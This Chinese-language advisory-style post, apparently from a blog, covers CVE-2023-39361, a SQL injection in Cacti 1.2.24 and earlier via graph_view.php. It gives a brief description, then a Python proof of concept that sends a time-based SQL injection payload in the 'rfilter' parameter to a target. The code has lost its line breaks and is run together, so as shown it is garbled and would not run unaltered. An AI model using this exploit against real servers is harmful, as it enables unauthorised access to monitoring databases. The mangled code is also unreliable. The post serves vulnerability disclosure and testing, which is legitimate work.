0x00 前言

Cacti是一套基于PHP,MySQL,SNMP及RRDTool開發的網絡流量監測圖形分析工具。

Cacti是通過 snmpget來獲取數據，使用 RRDtool繪畫圖形，而且你完全可以不需要了解RRDtool復雜的參數。

0x01 漏洞描述

漏洞存在于從graph_view.php文件調用的growt_right_pane_tree函數中。

在tree_content的情況下，通過html_validate_tree_vars函數驗證用戶輸入，隨后，如果tree_id參數大于0，則調用growt_right_pane_tree函數。

0x02 CVE編號

CVE-2023-39361

0x03 影響版本

Cacti<=1.2.24

0x04 測試POC

代碼語言：javascript

代碼運行次數：0

運行

AI代碼解釋

import argparse
import requests
import sys
import urllib3#import os
#os.environ['http_proxy'] = 'http://localhost:8080'sleep_time = 10
payload = f""""OR ""="(("));SELECT SLEEP({sleep_time});-- -"""def exploit():url = f"{target}/graph_view.php"params = {"action":"tree_content","node":"1-1-tree_anchor","rfilter":payload}print('[+] Sending payload...')print(f"[+] Payload: {payload}")session.get(url,params=params)if __name__=='__main__':urllib3.disable_warnings()parser = argparse.ArgumentParser(description="Cacti 1.2.24 - graph_view.php 'rfilter' SQL Injection (guest access)")parser.add_argument('-t','--target',help='',required=True)args = parser.parse_args()target = args.targetsession = requests.Session()exploit()